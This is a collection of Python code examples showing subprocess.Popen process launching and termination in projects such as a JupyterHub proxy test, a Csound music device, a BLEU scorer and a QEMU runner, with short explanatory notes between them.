    def wait_for_proxy():
        io_loop.run_sync(lambda: wait_for_http_server('http://%s:%i' %
                                                      (proxy_ip, proxy_port)))

    wait_for_proxy()

    app.start([])

    assert app.proxy_process is None

    routes = io_loop.run_sync(app.proxy.get_routes)
    assert list(routes.keys()) == ['/']

    # add user
    name = 'river'
    r = api_request(app, 'users', name, method='post')
    r.raise_for_status()
    r = api_request(app, 'users', name, 'server', method='post')
    r.raise_for_status()

    routes = io_loop.run_sync(app.proxy.get_routes)
    assert sorted(routes.keys()) == ['/', '/user/river']

    # teardown the proxy and start a new one in the same place
    proxy.terminate()
    proxy = Popen(cmd, env=env)
    wait_for_proxy()

    routes = io_loop.run_sync(app.proxy.get_routes)
    assert list(routes.keys()) == ['/']

    # poke the server to update the proxy
    r = api_request(app, 'proxy', method='post')
    r.raise_for_status()

    # check that the routes are correct
    routes = io_loop.run_sync(app.proxy.get_routes)
    assert sorted(routes.keys()) == ['/', '/user/river']

    # teardown the proxy again, and start a new one with different auth and port
    proxy.terminate()
    new_auth_token = 'different!'
    env['CONFIGPROXY_AUTH_TOKEN'] = new_auth_token
    proxy_port = 55432
    cmd = app.proxy_cmd + [
        '--ip',
        app.ip,
        '--port',
        str(app.port),
        '--api-ip',
        app.proxy_api_ip,
        '--api-port',
        str(proxy_port),
        '--default-target',
        'http://%s:%i' % (app.hub_ip, app.hub_port),
    ]

    proxy = Popen(cmd, env=env)
    wait_for_proxy()

    # tell the hub where the new proxy is
    r = api_request(app,
                    'proxy',
                    method='patch',
                    data=json.dumps({
                        'port': proxy_port,
                        'auth_token': new_auth_token,
                    }))
    r.raise_for_status()
    assert app.proxy.api_server.port == proxy_port

    # get updated auth token from main thread
    def get_app_proxy_token():
        q = Queue()
        app.io_loop.add_callback(lambda: q.put(app.proxy.auth_token))
        return q.get(timeout=2)

    assert get_app_proxy_token() == new_auth_token
    app.proxy.auth_token = new_auth_token

    # check that the routes are correct
    routes = io_loop.run_sync(app.proxy.get_routes)
    assert sorted(routes.keys()) == ['/', '/user/river']
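
The poll-then-terminate guard in _cleanup_proxy generalizes to any pytest
fixture that spawns a helper process. A sketch under that assumption (the
sleep command stands in for the real helper):

import pytest
from subprocess import Popen

@pytest.fixture
def helper_proc():
    proc = Popen(['sleep', '3600'])  # illustrative long-running helper
    yield proc
    if proc.poll() is None:          # only signal it if still alive
        proc.terminate()
        proc.wait()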
Example #39
    def _evaluate_model(self):

        logger.info("Started Validation: ")
        val_start_time = time.time()
        mb_subprocess = Popen(self.multibleu_cmd, stdin=PIPE, stdout=PIPE)
        total_cost = 0.0

        # Get target vocabulary
        if not self.trg_ivocab:
            sources = self._get_attr_rec(self.main_loop, 'data_stream')
            trg_vocab = sources.data_streams[1].dataset.dictionary
            self.trg_ivocab = {v: k for k, v in trg_vocab.items()}

        if self.verbose:
            ftrans = open(self.config['val_set_out'], 'w')

        for i, line in enumerate(self.data_stream.get_epoch_iterator()):
            """
            Load the sentence, retrieve the sample, write to file
            """

            seq = self._oov_to_unk(line[0], self.config['src_vocab_size'],
                                   self.unk_idx)
            input_ = numpy.tile(seq, (self.config['beam_size'], 1))

            # draw sample, checking to ensure we don't get an empty string back
            trans, costs = \
                self.beam_search.search(
                    input_values={self.source_sentence: input_},
                    max_length=3*len(seq), eol_symbol=self.eos_idx,
                    ignore_first_eol=True)

            # normalize costs according to the sequence lengths
            if self.normalize:
                lengths = numpy.array([len(s) for s in trans])
                costs = costs / lengths

            nbest_idx = numpy.argsort(costs)[:self.n_best]
            for j, best in enumerate(nbest_idx):
                try:
                    total_cost += costs[best]
                    trans_out = trans[best]

                    # convert idx to words
                    trans_out = self._idx_to_word(trans_out, self.trg_ivocab)

                except ValueError:
                    logger.info(
                        "Can NOT find a translation for line: {}".format(i +
                                                                         1))
                    trans_out = '<UNK>'

                if j == 0:
                    # Write to subprocess and file if it exists
                    print(trans_out, file=mb_subprocess.stdin)
                    if self.verbose:
                        print(trans_out, file=ftrans)

            if i != 0 and i % 100 == 0:
                logger.info(
                    "Translated {} lines of validation set...".format(i))

            mb_subprocess.stdin.flush()

        logger.info("Total cost of the validation: {}".format(total_cost))
        self.data_stream.reset()
        if self.verbose:
            ftrans.close()

        # send end of file, read output.
        mb_subprocess.stdin.close()
        stdout = mb_subprocess.stdout.readline()
        logger.info(stdout)
        out_parse = re.match(r'BLEU = [-.0-9]+', stdout)
        logger.info("Validation Took: {} minutes".format(
            float(time.time() - val_start_time) / 60.))
        assert out_parse is not None

        # extract the score
        bleu_score = float(out_parse.group()[6:])
        self.val_bleu_curve.append(bleu_score)
        logger.info(bleu_score)
        mb_subprocess.terminate()

        return bleu_score
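
The round trip with the BLEU scorer above reduces to: write one translation
per line to the child's stdin, close stdin to signal end of input, then read
the summary line. A minimal sketch (the scorer command and reference file
are assumptions):

import re
from subprocess import PIPE, Popen

scorer = Popen(['perl', 'multi-bleu.perl', 'reference.txt'],
               stdin=PIPE, stdout=PIPE, universal_newlines=True)
for sentence in ('first translated line', 'second translated line'):
    print(sentence, file=scorer.stdin)
scorer.stdin.close()                  # EOF makes the script print its score
score_line = scorer.stdout.readline()
match = re.match(r'BLEU = [-.0-9]+', score_line)
bleu = float(match.group()[6:]) if match else None
scorer.terminate()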
Example #40
class Nebulae(object):
    def __init__(self):
        if neb_globals.remount_fs is False:
            print("Nebulae is operating in \"Read/Write\" mode.")
            print("Filesystem will not be remounted during operation.")
            os.system("/home/alarm/QB_Nebulae_V2/Code/scripts/mountfs.sh rw")
        print "Nebulae Initializing"
        self.instr_cfg = cfg_path + "bootinstr.txt"
        self.orc_handle = conductor.Conductor(
        )  # Initialize Audio File Tables and Csound Score/Orchestra
        #self.currentInstr = "a_granularlooper"
        self.c = None
        self.pt = None
        self.ui = None
        self.c_handle = None
        self.led_process = None
        self.log = logger.NebLogger()
        # Check the config file for last instr
        if os.path.isfile(
                self.instr_cfg) and os.path.getsize(self.instr_cfg) > 0:
            # Get bank/instr from factory
            with open(self.instr_cfg, 'rb') as f:
                print "Reading bootinstr.txt"
                for line in f:
                    templist = line.strip().split(',')
                    if templist[0] == 'bank':
                        self.new_bank = templist[1]
                    elif templist[0] == 'instr':
                        self.new_instr = templist[1]
        else:
            self.new_bank = 'factory'
            self.new_instr = 'a_granularlooper'
        self.currentInstr = self.new_instr
        # Check if file exists, else reset to default instr
        factory_path = "/home/alarm/QB_Nebulae_V2/Code/instr/"
        user_path = "/home/alarm/instr/"
        pd_path = "/home/alarm/pd/"
        if self.new_bank == 'factory':
            path = factory_path + self.new_instr + '.instr'
        elif self.new_bank == 'user':
            path = user_path + self.new_instr + '.instr'
        elif self.new_bank == 'puredata':
            path = pd_path + self.new_instr + '.pd'
        else:
            print "bank not recocgnized."
            print self.new_bank
            path = 'factory'
        if os.path.isfile(path) == False:
            # set to default instr
            self.new_bank = 'factory'
            self.new_instr = 'a_granularlooper'
        self.first_run = True
        self.last_debug_print = time.time()

    def start(self, instr, instr_bank):
        print "Nebulae Starting"
        if self.currentInstr != self.new_instr:
            reset_settings_flag = True
        else:
            reset_settings_flag = False
        self.currentInstr = instr
        if self.c is None:
            self.c = ctcsound.Csound()
        self.log.spill_basic_info()
        floader = fileloader.FileLoader()
        floader.reload()
        self.orc_handle.generate_orc(instr, instr_bank)
        configData = self.orc_handle.getConfigDict()
        self.c.setOption("-iadc:hw:0,0")
        self.c.setOption("-odac:hw:0,0")  # Set option for Csound
        if configData.has_key("-B"):
            self.c.setOption("-B" + str(configData.get("-B")[0]))
        else:
            self.c.setOption("-B512")  # Liberal Buffer

        if configData.has_key("-b"):
            self.c.setOption("-b" + str(configData.get("-b")[0]))
        self.c.setOption("--realtime")
        self.c.setOption("-+rtaudio=alsa")  # Set option for Csound
        if debug is True:
            self.c.setOption("-m7")
        else:
            self.c.setOption("-m0")  # Set option for Csound
            self.c.setOption("-d")
        self.c.compileOrc(
            self.orc_handle.curOrc)  # Compile Orchestra from String
        self.c.readScore(
            self.orc_handle.curSco)  # Read in Score generated from notes
        self.c.start()  # Start Csound
        self.c_handle = ch.ControlHandler(
            self.c,
            self.orc_handle.numFiles(),
            configData,
            self.new_instr,
            bank=self.new_bank)  # Create handler for all csound comm.
        self.loadUI()
        self.pt = ctcsound.CsoundPerformanceThread(
            self.c.csound())  # Create CsoundPerformanceThread
        self.c_handle.setCsoundPerformanceThread(self.pt)
        self.pt.play()  # Begin performing the score in the performance thread
        self.c_handle.updateAll(
        )  # Update all values to ensure they're at their initial state.
        if reset_settings_flag == True:
            print("Changing Instr File -- Resetting Secondary Settings")
            self.c_handle.restoreAltToDefault()

    def run(self):
        new_instr = None
        request = False
        if self.first_run == False:
            self.c_handle.restoreAltToDefault()
        while (self.pt.status() == 0
               ):  # Run a loop to poll for messages, and handle the UI.
            self.ui.update()
            self.c_handle.updateAll()
            if debug_controls == True:
                if time.time() - self.last_debug_print > 0.25:
                    self.last_debug_print = time.time()
                    self.c_handle.printAllControls()
            request = self.ui.getReloadRequest()
            if request == True:
                self.cleanup()
        if request == True:
            self.first_run = False
            print "Received Reload Request from UI"
            print "index of new instr is: " + str(self.c_handle.instr_sel_idx)
            self.new_instr = self.ui.getNewInstr()
            print "new instr: " + self.new_instr
            self.new_bank = self.c_handle.getInstrSelBank()
            print "new bank: " + self.new_bank
            self.c.cleanup()
            self.ui.reload_flag = False  # Clear Reload Flag
            print "Reloading " + self.new_instr + " from " + self.new_bank
            # Store bank/instr to config
            self.writeBootInstr()
            # Get bank/instr from factory
            if self.new_bank == "puredata":
                self.start_puredata(self.new_instr)
                self.run_puredata()
            else:
                self.c.reset()
                self.start(self.new_instr, self.new_bank)
                self.run()
        else:
            print "Run Loop Ending."
            self.cleanup()
            print "Goodbye!"
            sys.exit()

    def cleanup(self):
        print "Cleaning Up"
        self.pt.stop()
        self.pt.join()

    def writeBootInstr(self):
        try:
            if neb_globals.remount_fs is True:
                os.system(
                    "sh /home/alarm/QB_Nebulae_V2/Code/scripts/mountfs.sh rw")
            with open(self.instr_cfg, 'w') as f:
                bankstr = 'bank,' + self.new_bank
                instrstr = 'instr,' + self.new_instr
                f.write(bankstr + '\n')
                f.write(instrstr + '\n')
            if neb_globals.remount_fs is True:
                os.system(
                    "sh /home/alarm/QB_Nebulae_V2/Code/scripts/mountfs.sh ro")
        except:
            "Could not write config file."

    def start_puredata(self, patch):
        self.log.spill_basic_info()
        if self.c is not None:
            self.c.cleanup()
            self.c = None
        self.c_handle = None
        self.currentInstr = patch
        self.new_instr = patch
        floader = fileloader.FileLoader()
        floader.reload()
        self.orc_handle.refreshFileHandler()
        fullPath = "/home/alarm/pd/" + patch + ".pd"
        #cmd = "pd -rt -nogui -verbose -audiobuf 5".split()
        if debug == False:
            cmd = "pd -rt -callback -nogui -audiobuf 5".split()
        else:
            cmd = "pd -rt -callback -nogui -verbose -audiobuf 5".split()
        cmd.append(fullPath)
        self.pt = Popen(cmd)
        print 'sleeping'
        time.sleep(2)
        self.c_handle = ch.ControlHandler(None,
                                          self.orc_handle.numFiles(),
                                          None,
                                          self.new_instr,
                                          bank="puredata")
        self.c_handle.setCsoundPerformanceThread(None)
        self.c_handle.enterPureDataMode()
        self.loadUI()

    def run_puredata(self):
        new_instr = None
        request = False
        self.c_handle.enterPureDataMode()
        while (request != True):
            self.c_handle.updateAll()
            if debug_controls == True:
                self.c_handle.printAllControls()
            self.ui.update()
            request = self.ui.getReloadRequest()
        if request == True:
            print "Received Reload Request from UI"
            print "index of new instr is: " + str(self.c_handle.instr_sel_idx)
            self.new_instr = self.ui.getNewInstr()
            self.new_bank = self.c_handle.getInstrSelBank()
            self.ui.reload_flag = False  # Clear Reload Flag
            print "Reloading " + self.new_instr + " from " + self.new_bank
            self.cleanup_puredata()
            # Store bank/instr to config
            self.writeBootInstr()
            if self.new_bank == "puredata":
                self.start_puredata(self.new_instr)
                self.run_puredata()
            else:
                self.start(self.new_instr, self.new_bank)
                self.run()
        else:
            print "Run Loop Ending."
            self.cleanup_puredata()
            print "Goodbye!"
            sys.exit()

    def cleanup_puredata(self):
        self.pt.terminate()
        self.pt.kill()

    def loadUI(self):
        print "Killing LED program"
        cmd = "sudo pkill -1 -f /home/alarm/QB_Nebulae_V2/Code/nebulae/bootleds.py"
        os.system(cmd)
        if self.ui is None:
            self.ui = ui.UserInterface(self.c_handle)  # Create User Interface
        else:
            self.ui.controlhandler = self.c_handle
            self.ui.clearAllLEDs()
        self.c_handle.setInstrSelBank(self.new_bank)
        self.ui.setCurrentInstr(self.new_instr)

    def launch_bootled(self):
        cmd = "sudo pkill -1 -f /home/alarm/QB_Nebulae_V2/Code/nebulae/bootleds.py"
        os.system(cmd)
        print "Launching LED program"
        fullCmd = "python2 /home/alarm/QB_Nebulae_V2/Code/nebulae/bootleds.py loading"
        self.led_process = Popen(fullCmd, shell=True)
        print 'led process created: ' + str(self.led_process)
Example #41
    api.projects = Projects()

api.vm = VM()
api.quota = Quota()
api.user = User()
api.templatelist = TemplateList()
cherrypy.tree.mount(api, "/api", "config/api.conf")

# Launch websockify for NoVNC
wsparams = [
    '/usr/bin/websockify',
    '-v',
    str(cherrypy.config.get("wsport")),
    '--target-config=' + cherrypy.config.get("wstokendir")
]

if cherrypy.config.get("wscert") != None:
    wsparams.append('--cert=' + cherrypy.config.get("wscert"))
    wsparams.append('--key=' + cherrypy.config.get("wskey"))

websockify = Popen(wsparams)

if cherrypy.config.get("wsgi_enabled") == True:
    # make WSGI compliant
    application = cherrypy.tree
else:
    # run as stand alone
    cherrypy.engine.start()
    cherrypy.engine.block()
    websockify.terminate()
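
Note that in the WSGI branch above the script returns without ever reaching
websockify.terminate(). One hedged safeguard (not in the original) is to
register the cleanup unconditionally:

import atexit
atexit.register(websockify.terminate)  # runs even on the WSGI path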
Example #42
class Raytracer(object):
    @contract(directions='None|seq(number)')
    def __init__(self, directions=None, raytracer='raytracer2'):
        ''' 
            directions are needed to call raytrace; 
            not necessary to call query_circle. 
        '''
        self.raytracer = raytracer
        self.p = None
        self.directions = directions

    def init_connection(self, raytracer):
        try:
            self.p = Popen(raytracer, stdout=PIPE, stdin=PIPE)
            self.child_stream = CJSONStream(self.p.stdout)
        except OSError as e:
            msg = ('Could not open connection to raytracer %r: %s.' %
                   (raytracer, e.strerror))
            msg += "\nCheck that:\n"
            msg += "1) You installed the executable raytracer2 from vehicles/src/raytracer.\n"
            msg += "2) It is installed in one of the directories in PATH (try 'raytracer2' from shell).\n"
            raise Exception(msg)

        if self.directions is not None:
            sensor_setup = {
                "class": "sensor",
                "directions": list(self.directions)
            }
            self.write_to_connection(sensor_setup)

    def write_to_connection(self, ob):
        if self.p is None:
            self.init_connection(self.raytracer)
        self.p.stdin.write(cjson.encode(ob))  # @UndefinedVariable
        self.p.stdin.write('\n')
        self.p.stdin.flush()

    def read_answer(self, expected):
        answer = self.child_stream.read_next()
        if answer is None:
            raise Exception("Could not communicate with child")

        if (not isinstance(answer, dict) or 'class' not in answer
                or answer['class'] != expected):
            raise Exception('Invalid response %r' % answer)

        return answer

    def __del__(self):
        if 'p' not in self.__dict__:
            # partial initialization
            return
        if self.p is None:
            return

        self.p.stdin.close()
        try:
            self.p.terminate()
            # print "Closing pipe %s, %s" % (self.p.stdin, self.p.stdout)
            self.p.wait()
        except (OSError, AttributeError):
            # Exception AttributeError: AttributeError("'NoneType' object
            # has no attribute 'SIGTERM'",)
            # in <bound method RangefinderUniform.__del__
            # of RangefinderUniform> ignored
            # http://stackoverflow.com/questions/2572172/
            pass
        # print " Closed pipe %s, %s" % (self.p.stdin,self.p.stdout)

    @contract(surface_id='int',
              center='seq[2](number)',
              radius='>0',
              solid='bool')
    def add_circle(self, surface_id, center, radius, solid):
        msg = {
            "class": "add_circle",
            'surface': surface_id,
            'radius': radius,
            'center': center,
            'solid_inside': 1 if solid else 0
        }
        self.write_to_connection(msg)

    @contract(surface_id='int', points='list(seq[2](number))')
    def add_polyline(self, surface_id, points):
        msg = {
            "class": "add_polyline",
            "surface": surface_id,
            "points": points
        }
        self.write_to_connection(msg)

    @contract(position='seq[2](number)', orientation='number')
    def query_sensor(self, position, orientation):

        query_object = {
            "class": "query_sensor",
            "position": [position[0], position[1]],
            "orientation": orientation
        }
        self.write_to_connection(query_object)
        answer = self.read_answer("query_sensor_response")

        # We have null -> None; make sure that None -> nan
        for field in list(answer.keys()):
            value = answer[field]
            if isinstance(value, list):
                value = [x if x is not None else np.nan for x in value]
                value = np.array(value)
                answer[field] = value

        answer['valid'] = answer['valid'].astype('bool')

        return answer

    @contract(center='seq[2](number)', radius='>0')
    def query_circle(self, center, radius):
        """ Returns tuple (hit, surface_id) """
        query_object = {
            "class": "query_circle",
            "center": [center[0], center[1]],
            "radius": radius
        }

        self.write_to_connection(query_object)
        answer = self.read_answer("query_circle_response")
        hit = answer['intersects'] == 1
        if hit:
            surface = answer['surface']
        else:
            surface = None

        return hit, surface
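
Possible usage of the wrapper above (a sketch; the geometry values are
illustrative). The pipe to the raytracer binary is opened lazily on the
first write, so building the object is cheap:

rt = Raytracer(directions=[0.0, 1.57, 3.14])
rt.add_circle(surface_id=0, center=[0.0, 0.0], radius=1.0, solid=True)
hit, surface = rt.query_circle(center=[0.5, 0.0], radius=0.2)
answer = rt.query_sensor(position=[2.0, 0.0], orientation=3.14)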
Example #43
class SystemValidator:
    def __init__(self, immortals_root: Optional[str] = None):
        self.immortals_root = immortals_root
        self.das_process = None  # type: Popen
        self.das_stdout = None
        self.das_stderr = None
        self.test_listener = None  # type: TABehaviorValidator
        self.harness = None  # type: LLHarness
        self.test_suite_identifier = None  # type: str
        self.test_identifier = None  # type: str
        self._current_test_scenario = None  # type: Phase2TestScenario

    def _start_das(self):
        # target_override_filepath = _construct_override_file(test_scenario=test_scenario, overrides=overrides)

        if self.immortals_root is None:
            immortals_root = get_configuration().globals.immortalsRoot
        else:
            immortals_root = os.path.abspath(self.immortals_root)
            print(immortals_root)

        self.das_stdout = open(
            os.path.join(
                get_configuration().globals.globalLogDirectory,
                self._current_test_scenario.scenarioIdentifier +
                '-start-stdout.txt'), 'a')
        self.das_stderr = open(
            os.path.join(
                get_configuration().globals.globalLogDirectory,
                self._current_test_scenario.scenarioIdentifier +
                '-start-stderr.txt'), 'a')
        try:
            self.das_process = Popen([
                'bash',
                os.path.join(immortals_root, 'das/start.sh'), "-v", "DEBUG"
            ],
                                     cwd=os.path.abspath(
                                         os.path.join(immortals_root,
                                                      'harness')),
                                     stdin=PIPE,
                                     stderr=self.das_stderr,
                                     stdout=self.das_stdout)
        except ResourceWarning:
            # Ignore this...
            pass

    def _stop_das(self):
        self.das_process.terminate()
        try:
            self.das_process.wait(timeout=10)
        except subprocess.TimeoutExpired:
            # SIGTERM was ignored; force the DAS down
            self.das_process.kill()
            self.das_process.wait()

        if not self.das_stdout.closed:
            self.das_stdout.flush()
            self.das_stdout.close()
        if not self.das_stderr.closed:
            self.das_stderr.flush()
            self.das_stderr.close()

    def done_listener(self, next_test_scenario: Phase2TestScenario):
        self._stop_das()

        if not get_configuration().debug.useMockDas and \
                self._current_test_scenario.submissionFlow is not Phase2SubmissionFlow.BaselineA:
            ir = get_configuration().globals.immortalsRoot
            results = subprocess.run(['bash', 'setup.sh', '--unattended'],
                                     cwd=os.path.join(ir, 'database/server'),
                                     stdout=subprocess.PIPE,
                                     stderr=subprocess.STDOUT)
            results.check_returncode()

            if self._current_test_scenario.perturbationScenario == PerturbationScenario.P2CP1DatabaseSchema and \
                    (self._current_test_scenario.submissionFlow == Phase2SubmissionFlow.BaselineB or
                     self._current_test_scenario.submissionFlow == Phase2SubmissionFlow.Challenge):
                cwd = os.path.join(ir, 'das/das-service')
                results = subprocess.run([
                    'java', '-jar',
                    os.path.join(cwd, 'das.jar'), '--perform-schema-analysis'
                ],
                                         cwd=cwd,
                                         stdout=subprocess.PIPE,
                                         stderr=subprocess.STDOUT)
                results.check_returncode()

            gradle_original = os.path.join(ir, 'settings.gradle.original')
            if os.path.exists(gradle_original):
                shutil.copy2(gradle_original,
                             os.path.join(ir, 'settings.gradle'))

        if next_test_scenario is not None:
            self.harness.reset_sequence_counter()
            self._current_test_scenario = next_test_scenario
            self._start_das()

        else:
            ig.force_exit()

    def start(self, test_suite_identifier: str, test_identifier: str = None):
        """
        :param test_suite_identifier: The test suite to execute
        :param test_identifier: The test to execute from the test suite. If None, all test suite tests are run
        """
        try:
            self.harness = LLHarness(host=get_configuration().testHarness.url,
                                     port=get_configuration().testHarness.port,
                                     done_listener=self.done_listener)

            initial_test_scenario = self.harness.load_test(
                test_suite_identifier=test_suite_identifier,
                test_identifier=test_identifier)

            ig.add_exit_handler(self.exit_handler)

            self._current_test_scenario = initial_test_scenario
            self._start_das()

            self.harness.start()
            ig.force_exit()
            sys.exit(ig.get_exit_code())
        except Exception as e:
            traceback.print_exc()
            sys.exit(1)

    def exit_handler(self):
        self.harness.stop()
        self._stop_das()
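
The terminate/wait/kill sequence in _stop_das above is a common graceful-
shutdown idiom. As a standalone helper it might read (sketch):

import subprocess

def shutdown(proc, grace_seconds=10):
    # Ask the process to exit, escalating to SIGKILL after a grace period.
    proc.terminate()
    try:
        proc.wait(timeout=grace_seconds)
    except subprocess.TimeoutExpired:
        proc.kill()
        proc.wait()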
Example #44
File: YMD-0.5.py Project: RGCampbell/YMD
    def main_download(self):

        #greys out some of the widgets
        self.bottom_label.grid(row=6)
        self.bottom_label.config(text="downloading")
        self.download_button.grid_remove()
        self.cancel_button.grid(row=4, pady=(0, 2))
        #self.cancel_button = ttk.Button(self, text="cancel", command=cancel)
        #self.cancel_button.grid(row=4, pady=(0,2))
        download_run = 0
        self.break_main = 0

        while True:
            if self.break_main == 0:
                #starts progressbar
                self.progressbar.grid(row=5)
                self.progressbar.start(35)

                for word in self.lines:
                    if os.path.exists(str(self.output) + "\\" + word +
                                      ".mp3"):
                        download_run += 1
                    else:
                        #search function
                        query_string = urllib.parse.urlencode(
                            {"search_query": word})
                        html_content = urllib.request.urlopen(
                            "http://www.youtube.com/results?" + query_string)
                        search_results = re.findall(
                            r'href=\"\/watch\?v=(.{11})',
                            html_content.read().decode())
                        search_1 = ("http://www.youtube.com/watch?v=" +
                                    search_results[0])
                        search_2 = ("http://www.youtube.com/watch?v=" +
                                    search_results[2])
                        s1 = pafy.new(search_1)
                        s2 = pafy.new(search_2)

                        #sets link
                        if int(s1.length) <= int(s2.length) and int(
                                s1.length) > 90:
                            link = str(search_1)
                        elif int(s2.length) < int(s1.length) and int(
                                s2.length) > 90:
                            link = str(search_2)
                        else:
                            link = str(search_1)

                        #downloads
                        CREATE_NO_WINDOW = 0x08000000
                        name = word + ".opus"
                        download_com = [
                            "cmd.exe", "/k", 'youtube-dl', "-x", "-o",
                            str(name),
                            str(link)
                        ]
                        download = Popen(download_com,
                                         creationflags=CREATE_NO_WINDOW)

                        #sets conversion directory
                        if self.check_sort_into == 1:
                            if not os.path.isdir(str(self.output)):
                                os.makedirs(str(self.output))
                            pos = word.index('-') - 1
                            artist = word[:pos]
                            if os.path.isdir(str(self.output) + "\\" +
                                             artist) == True:
                                loc_name = str(
                                    self.output
                                ) + "\\" + artist + "\\" + word + ".mp3"
                            else:
                                os.makedirs(str(self.output) + "\\" + artist)
                                loc_name = str(
                                    self.output
                                ) + "\\" + artist + "\\" + word + ".mp3"
                            mus_pos = self.output.index('music') - 1
                            initial_file = (str(self.output[:mus_pos]) + "\\" +
                                            str(name))
                        else:
                            loc_name = str(self.output) + "\\" + word + ".mp3"
                            initial_file = (str(self.output) + "\\" +
                                            str(name))

                        print(initial_file)
                        print(loc_name)
                        convert_command = [
                            "C:/Program Files (x86)/VideoLAN/VLC/vlc.exe",
                            "-I", "dummy", "-vvv", initial_file,
                            "--sout=#transcode{acodec=mpga,ab=192}:standard{access=file,dst="
                            + loc_name + "}"  # close the standard{} block
                        ]
                        print(loc_name)
                        time.sleep(1)
                        #converts to mp3
                        while True:
                            if os.path.exists(initial_file):
                                time.sleep(2)
                                convert = Popen(convert_command)
                                break
                            else:
                                pass

                        time.sleep(10)
                        #deletes unconverted file
                        while True:
                            try:
                                os.remove(initial_file)
                                convert.terminate()
                                break
                            except:
                                pass
                            time.sleep(2)
                        download_run += 1
                else:
                    break

            else:
                break

            if len(self.lines) == download_run:
                break

        #progressbar stops
        self.cancel_button.grid_forget()
        self.download_button.grid(row=4, pady=(0, 2))
        self.progressbar.stop()
        self.progressbar.grid_remove()
        self.bottom_label.grid_remove()

        if len(self.lines) == download_run:
            self.bottom_label.grid(row=5)
            self.bottom_label.config(text="completed")
        elif self.break_main == 1:
            self.bottom_label.grid(row=5)
            self.bottom_label.config(text="canceled")
Example #45
class PythonCollector(BaseCollector):
    """The class responsible for loading Jinja templates and rendering them.

    It defines some configuration options, implements the `render` method,
    and overrides the `update_env` method of the [`BaseRenderer` class][mkdocstrings.handlers.base.BaseRenderer].
    """

    default_config: dict = {"filters": ["!^_[^_]"]}
    """The default selection options.

    Option | Type | Description | Default
    ------ | ---- | ----------- | -------
    **`filters`** | `List[str]` | Filter members with regular expressions. | `[ "!^_[^_]" ]`
    **`members`** | `Union[bool, List[str]]` | Explicitly select the object members. | *`pytkdocs` default: `True`*

    If `members` is a list of names, filters are applied only on the members children (not the members themselves).
    If `members` is `False`, none are selected.
    If `members` is `True` or an empty list, filters are applied on all members and their children.

    Members affect only the first layer of objects, while filters affect the whole object-tree recursively.

    Every filter is run against every object name. An object can be un-selected by a filter and re-selected by the
    next one:

    - `"!^_"`: exclude all objects starting with an underscore
    - `"^__"`: but select all objects starting with **two** underscores

    Obviously one could use a single filter instead: `"!^_[^_]"`, which is the default.
    """
    def __init__(self, setup_commands: Optional[List[str]] = None) -> None:
        """Initialize the object.

        When instantiating a Python collector, we open a subprocess in the background with `subprocess.Popen`.
        It will allow us to feed input to and read output from this subprocess, keeping it alive during
        the whole documentation generation. Spawning a new Python subprocess for each "autodoc" instruction would be
        too resource intensive, and would slow down `mkdocstrings` a lot.

        Arguments:
            setup_commands: A list of python commands as strings to be executed in the subprocess before `pytkdocs`.
        """
        log.debug("Opening 'pytkdocs' subprocess")
        env = os.environ.copy()
        env["PYTHONUNBUFFERED"] = "1"

        if setup_commands:
            # prevent the Python interpreter or the setup commands
            # from writing to stdout as it would break pytkdocs output
            commands = [
                "import sys",
                "from io import StringIO",
                "from pytkdocs.cli import main as pytkdocs",
                "sys.stdout = StringIO()",  # redirect stdout to memory buffer
                *setup_commands,
                "sys.stdout.flush()",
                "sys.stdout = sys.__stdout__",  # restore stdout
                "pytkdocs(['--line-by-line'])",
            ]
            cmd = [sys.executable, "-c", "; ".join(commands)]
        else:
            cmd = [sys.executable, "-m", "pytkdocs", "--line-by-line"]

        self.process = Popen(  # noqa: S603,S607 (we trust the input, and we don't want to use the absolute path)
            cmd,
            universal_newlines=True,
            stdout=PIPE,
            stdin=PIPE,
            bufsize=-1,
            env=env,
        )

    def collect(self, identifier: str, config: dict) -> CollectorItem:
        """Collect the documentation tree given an identifier and selection options.

        In this method, we feed one line of JSON to the standard input of the subprocess that was opened
        during instantiation of the collector. Then we read one line of JSON on its standard output.

        We load back the JSON text into a Python dictionary.
        If there is a decoding error, we raise a CollectionError carrying the details.

        If the dictionary contains an `error` key, we raise a CollectionError with its value
        (appending the optional `traceback` value when present).

        If the dictionary values for keys `loading_errors` and `parsing_errors` are not empty,
        we log them as warnings.

        Then we pick up the only object within the `objects` list (there's always only one, because we collect
        them one by one), rebuild its category lists
        (see [`rebuild_category_lists()`][mkdocstrings.handlers.python.rebuild_category_lists]),
        and return it.

        Arguments:
            identifier: The dotted-path of a Python object available in the Python path.
            config: Selection options, used to alter the data collection done by `pytkdocs`.

        Raises:
            CollectionError: When there was a problem collecting the object documentation.

        Returns:
            The collected object-tree.
        """
        final_config = ChainMap(config, self.default_config)

        log.debug("Preparing input")
        json_input = json.dumps(
            {"objects": [{
                "path": identifier,
                **final_config
            }]})

        log.debug("Writing to process' stdin")
        self.process.stdin.write(json_input + "\n")  # type: ignore
        self.process.stdin.flush()  # type: ignore

        log.debug("Reading process' stdout")
        stdout = self.process.stdout.readline()  # type: ignore

        log.debug("Loading JSON output as Python object")
        try:
            result = json.loads(stdout)
        except json.decoder.JSONDecodeError as exception:
            error = "\n".join(
                ("Error while loading JSON:", stdout, traceback.format_exc()))
            raise CollectionError(error) from exception

        error = result.get("error")
        if error:
            if "traceback" in result:
                error += f"\n{result['traceback']}"
            raise CollectionError(error)

        for loading_error in result["loading_errors"]:
            log.warning(loading_error)

        for errors in result["parsing_errors"].values():
            for parsing_error in errors:
                log.warning(parsing_error)

        # We always collect only one object at a time
        result = result["objects"][0]

        log.debug("Rebuilding categories and children lists")
        rebuild_category_lists(result)

        return result

    def teardown(self) -> None:
        """Terminate the opened subprocess, set it to `None`."""
        log.debug("Tearing process down")
        self.process.terminate()
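
Possible usage of the collector above (a sketch; the dotted identifier and
filter are illustrative). One long-lived pytkdocs subprocess serves any
number of collect() calls before teardown:

collector = PythonCollector()
item = collector.collect("mypackage.mymodule.MyClass", {"filters": ["!^_"]})
collector.teardown()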
Example #46
class QEMU(object):
    _GDBPORT = None

    def __init__(self, *make_args):
        # Check that QEMU is not currently running
        try:
            GDBClient(self.get_gdb_port(), timeout=0).close()
        except socket.error:
            pass
        else:
            print("""\
GDB stub found on port %d.
QEMU appears to already be running.  Please exit it if possible or use
'killall qemu' or 'killall qemu.real'.""" % self.get_gdb_port(),
                  file=sys.stderr)
            sys.exit(1)

        if options.verbose:
            show_command(("make", ) + make_args)
        cmd = ("make", "-s", "--no-print-directory") + make_args
        self.proc = Popen(cmd,
                          stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT,
                          stdin=subprocess.PIPE)
        # Accumulated output as a string
        self.output = ""
        # Accumulated output as a bytearray
